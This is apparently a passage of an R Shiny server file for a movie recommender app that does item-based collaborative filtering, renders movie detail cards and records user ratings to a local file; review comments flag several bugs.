# and NA-padded type* / director* / actor* columns.
movie_all = read.table("./data/movie_all.rdata")
# Item-item correlation matrices. The header row is read separately so
# fread can skip it; the "X" prefix that R prepends to numeric column
# names is stripped so the columns are raw movie ids.
header1 = read.table("./data/movie_cor.rdata", header = TRUE, nrow = 1)
movie_cor = fread("./data/movie_cor.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor, colnames(header1))
colnames(movie_cor) = gsub("X(\\d+)","\\1",colnames(movie_cor))
# NOTE(review): data.table does not support row names; verify that this
# rownames<- assignment has the intended effect downstream.
rownames(movie_cor) = colnames(movie_cor)
header2 = read.table("./data/movie_cor2.rdata", header = TRUE, nrow = 1)
movie_cor2 = fread("./data/movie_cor2.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor2, colnames(header2))
colnames(movie_cor2) = gsub("X(\\d+)","\\1",colnames(movie_cor2))
rownames(movie_cor2) = colnames(movie_cor2)
# Per-user comments/ratings and pre-computed movie clusters.
people_all = fread("./data/people_all.csv")
settle_cluster = read_rds("./data/settle_cluster.rdata")
movie_cluster = read.table("./data/movie_cluster.rdata")
# NOTE(review): this re-seeds the rating log with a dummy row on every
# app start, wiping any ratings saved in a previous session — confirm
# that is intended.
docu =data.frame(score=c(1), id = c(1)) ###Initialization the user-docu-vector!!!
write.table(docu,"./data/docu.rdata") ###Initialization the user-docu-vector!!!
# Build a 6-movie recommendation list from the user's saved ratings:
# three picks from the rating-correlation matrix (movie_cor) and three
# from the co-viewer matrix (movie_cor2).
#
# Returns a numeric vector of 6 movie ids. Reads the rating log at
# ./data/docu.rdata and relies on the globals movie_cor / movie_cor2.
create_movies = function(){
  # Fix: the original read a machine-specific absolute path
  # (/Applications/学习/...), which breaks on any other machine; use the
  # same relative path every other part of the app uses.
  docu2 <- read.table("./data/docu.rdata")
  docu3 <- docu2[-1, ]    # drop the dummy initialization row
  scored_id <- docu3$id   # ids the user has already rated
  # Item-based collaborative filtering: the predicted score for an
  # unrated movie is the user's ratings weighted by that movie's
  # correlation with each rated movie, normalized by the summed
  # correlations of the rated set.
  movie_recon <- function(movie_cor){
    n <- length(movie_cor[, 1])
    names_in <- as.numeric(colnames(movie_cor)[colnames(movie_cor) %in% scored_id])
    score_frame <- data.frame(id = names_in) %>% left_join(docu3, by = "id")
    # Dense score vector aligned with the matrix columns; 0 for unrated.
    score_vector <- numeric(n)
    score_vector[which(colnames(movie_cor) %in% scored_id)] <- score_frame$score
    # Subtract the identity so a movie's self-correlation of 1 does not
    # feed its own prediction.
    Movie_1 <- (movie_cor - diag(rep(1, n))) %*% t(t(score_vector))
    Location <- as.numeric(colnames(movie_cor) %in% scored_id)
    Movie_2 <- (movie_cor - diag(rep(1, n))) %*% t(t(Location))
    Movie <- Movie_1 / Movie_2
    # Exclude already-rated movies, then take the top three predictions.
    Movie_pool <- Movie[!(rownames(Movie) %in% scored_id), ]
    as.numeric(names(Movie_pool))[tail(order(Movie_pool), n = 3)]
  }
  c(movie_recon(movie_cor), movie_recon(movie_cor2))
}
function(input, output, session) {
observeEvent(input$refresh, {
# NOTE(review): `input` is a read-only reactivevalues object in Shiny;
# this assignment throws "Attempted to assign value to a read-only
# reactivevalues object" at runtime. Use a reactiveVal() if a reset
# flag is needed. (Also `=` where the file otherwise uses `<-`.)
input$save_inputs =0
# Re-read the rating log written by the save_* observers.
docu2 <- read.table("./data/docu.rdata")
# Choose the next movie to show: cold-start random picks from the first
# three clusters until enough ratings exist, then titles from the
# collaborative-filtering recommender.
# NOTE(review): length() on a data.frame is its COLUMN count (always 2
# here), so only the first branch can ever run — nrow(docu2) was
# probably intended. Also, `id_list` in the final branch is a fresh
# local on every invocation of this handler, so that branch would fail
# with "object 'id_list' not found". Confirm the intended logic.
if (length(docu2) <=10 ){
  id = sample(c(settle_cluster[[1]],settle_cluster[[2]],settle_cluster[[3]]),1)
}else if((length(docu2)-10)%%6 == 1){
  id_list = create_movies()
  id = sample(id_list,1)
  id_list = id_list[id_list!=id]
}else{
  id = sample(id_list,1)
  id_list = id_list[id_list!=id]
}
poster = movie_all[movie_all$id==id, 'poster']
# Main detail card for the chosen movie.
output$movie_info_main <- renderUI({
  # Collapse the NA-padded type/director/actor columns to "a/b/c".
  type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
  type = type[!is.na(type)]
  type = paste(type,collapse = "/")
  score = movie_all[movie_all$id==id, 'score']
  pop = movie_all[movie_all$id==id, 'pop']
  rate = paste(score," (",pop,"人评价)",sep = "")
  director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
  director = director[!is.na(director)]
  director = paste(director,collapse = "/")
  director = paste("导演:",director)
  actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
  actor = actor[!is.na(actor)]
  actor = paste(actor,collapse = "/")
  actor = paste("演员",actor)
  tags$div(
    img(src = poster),
    h3(movie_all[movie_all$id==id, 'English_name']),
    h4(movie_all[movie_all$id==id, 'name']),
    h4(rate),
    h5(type),
    h6(director),
    h6(actor)
  )
})
observeEvent(input$save_inputs, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_score))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = id))
write.table(docu2, "./data/docu.rdata")
})
    # Latest saved rating, recomputed each time the save button fires;
    # this is the reactive read by the distribution plot below.
    user_rate <- eventReactive(input$save_inputs, as.numeric(gsub('(\\d).+?','\\1',input$user_score)))
    # Echo the rating back only when it is low (<= 2); for higher ratings
    # the `if` yields NULL and renderUI shows nothing.
    output$real_rate <- renderUI(
      if(user_rate()<=2){
        tags$h3(user_rate())
      }
    )
###Comment_block
observeEvent(input$side, {
comment = people_all[people_all$movie_id == id,]
comment = comment[!is.na(comment$movie_score),]
comment$movie_comment = as.character(comment$movie_comment)
comment = comment[comment$movie_comment!="",]
output$movie_inspect5<-renderTable({
comment[comment$movie_score==5,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect4<-renderTable({
comment[comment$movie_score==4,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect3<-renderTable({
comment[comment$movie_score==3,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect2<-renderTable({
comment[comment$movie_score==2,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect1<-renderTable({
comment[comment$movie_score==1,c('movie_comment','movie_time','user_id')]
})
})
    ###Dist_block
    # Rating-distribution panel: plot the public score distribution of the
    # current movie and overlay the user's own rating.
    observeEvent(input$side, {
      x = 1:5
      # rating* columns hold percentage strings (stripped of "%" below) and
      # are converted to fractions.  NOTE(review): rev() implies the columns
      # are stored highest-star first -- confirm against the scraper output.
      y = select(movie_all[movie_all$id==id,],starts_with('rating'))
      y = sapply(y, function(x) as.numeric(sub("%", "", x))/100)
      y = rev(y)
      a = data.frame(x = x, y = y)
      output$user_dist <- renderPlot({
        # Smoothed distribution curve; the user's rating is drawn as a fixed
        # (non-aes) point at y = 0.
        ggplot(a, mapping = aes(x = x, y = y)) + geom_smooth(col='royalblue')+
          theme_hc() + geom_point(x=user_rate(),y=0, col='tomato',
                                  alpha = 0.25, cex=5)
      })
    })
###Movie_might_block
observeEvent(input$side, {
###BY_movie_block
poster_list=c()
cor_list = movie_cor[id==rownames(movie_cor),]
movie_might = names(cor_list)[tail(order(cor_list))][1:5]
output$movie_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[1],'poster'])
})
observeEvent(input$movie_select1,{
id = movie_might[1]
output$movie_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might1, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[1]))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_movie_might1, as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1)))
output$movie_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[2],'poster'])
})
observeEvent(input$movie_select2,{
id = movie_might[2]
output$movie_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might2, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score2))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[3],'poster'])
})
observeEvent(input$movie_select3,{
id = movie_might[3]
output$movie_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might3, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[4],'poster'])
})
observeEvent(input$movie_select4,{
id = movie_might[4]
output$movie_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might4, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[5],'poster'])
})
observeEvent(input$movie_select5,{
id = movie_might[5]
output$movie_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might5, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###User_might_block
observeEvent(input$side, {
poster_list2=c()
cor_list2 = movie_cor2[id==rownames(movie_cor2),]
user_might = names(cor_list2)[tail(order(cor_list2))][1:5]
output$user_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[1],'poster'])
})
observeEvent(input$user_select1,{
id = user_might[1]
output$user_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might1, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score1))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[1]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[2],'poster'])
})
observeEvent(input$user_select2,{
id = user_might[2]
output$user_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might2, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
observeEvent(input$save_user_might2, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[3],'poster'])
})
observeEvent(input$user_select3,{
id = user_might[3]
output$user_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might3, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[4],'poster'])
})
observeEvent(input$user_select4,{
id = user_might[4]
output$user_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might4, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[5],'poster'])
})
observeEvent(input$user_select5,{
id = user_might[5]
output$user_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might5, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###sever_user_analyse_block
observeEvent(input$side, {
docu3 = docu2[-1,]
test2 = plyr::join(docu3, movie_all, by = "id")
output$hist <- renderPlot({
hist(test2$score)
})
names(test2)[1] = "docu_score"
test3 = select(test2, docu_score, starts_with("type"))
test3 = gather(test3, "type1":"type5",key = "index", value = "type")
test3 = test3[!is.na(test3$type),c(1,3)]
output$table<-renderTable({
as.data.frame(t(tapply(test3$docu_score, test3$type, mean, na.rm = T)))})
table(test3$type)
})
})
observeEvent(input$refresh1,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[1]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster1_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh2,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[2]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster2_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh3,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[3]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster3_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh4,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[4]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster4_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh5,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[5]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster5_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh6,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[6]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster6_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh7,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[7]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster7_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh8,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[8]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster8_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh9,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[9]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster9_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh10,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[10]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster10_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh11,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[11]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster11_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
